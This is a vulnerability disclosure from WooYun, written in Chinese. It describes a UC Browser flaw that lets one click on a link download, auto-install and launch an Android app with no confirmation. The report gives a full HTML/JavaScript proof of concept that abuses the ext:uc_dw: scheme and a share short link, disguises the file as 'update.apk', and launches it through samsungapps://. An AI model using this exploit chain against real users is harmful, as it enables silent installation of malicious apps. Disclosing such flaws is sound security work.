WooYun.org

前几天更新到最新版的UC浏览器之后，发现UC增加了一个新功能，自动安装应用。测试之后发现结合之前的一个洞可实现点击一个链接自动下载安装并启动APP。
新版的UC浏览器在下载完app之后会提示用户开启自动安装功能

只要开启了该功能，下载完app就会自动安装。之前发过一个洞可以让UC浏览器自动下载APP http://**.**.**.**/bugs/wooyun-2010-0106283
之前说需要用到一个**.**.**.**域下的URL重定向，后来发现并不需要。只要让浏览器打开一个**.**.**.**域下的窗口，然后让该窗口跳到ext:uc_dw就行了。

w = window.open("http://www.**.**.**.**");
w.location.href = "ext:uc_dw:download_url";

但是如果下载地址不是**.**.**.**域下，还是会弹出下载确认框。这个可以使用UC自带的分享功能，把下载链接分享到QQ，就能得到一个**.**.**.**域下的短链接http://fxt1.**.**.**.**/11_1dp9T。但是通过该短链接下载的文件，文件名为11_1dp9T，所以需要想办法自定义下载文件名。通过查看UC的代码，发现UC会将ext:uc_dw:后的内容使用|分割，分别作为下载地址，文件名，cookies等。

ext:uc_dw:download_url|filename|download_cookies|download_taskrefuri

所以也就可以自定义下载的文件名了，这样就完成了自动下载APP。
要让安装后的APP自动启动可以使用伪协议，但是因为UC把自定义的伪协议都拦截了，所以也不能使用Intent来启动。但是对于非三星的手机依然可以用伪协议来启动，因为在UC的代码中发现还有samsungapps://可以使用。三星手机应该也可以通过写成UC的插件来通过网页启动，具体还没测试。

所以构造POC如下：

<body>
<h1>DEMO</h1>
<a href=javascript:foo()>Click</a>
<iframe id="uc" style=display:none></iframe>
</body>
<script> 
var w;
var t;
 
function foo(){
w = window.open("http://www.**.**.**.**");
t = setInterval('bar()',100);
setTimeout('baz()', 1000);
}
function bar(){
if (w.location.href !== 'about:blank') {
w.location.href = "ext:uc_dw:http://fxt1.**.**.**.**/11_1dp9T|update.apk|";
clearInterval(t);
}
}
function baz() {
frame = document.getElementById("uc");
frame.src = "samsungapps://";
setTimeout('baz()', 1000);
}
</script>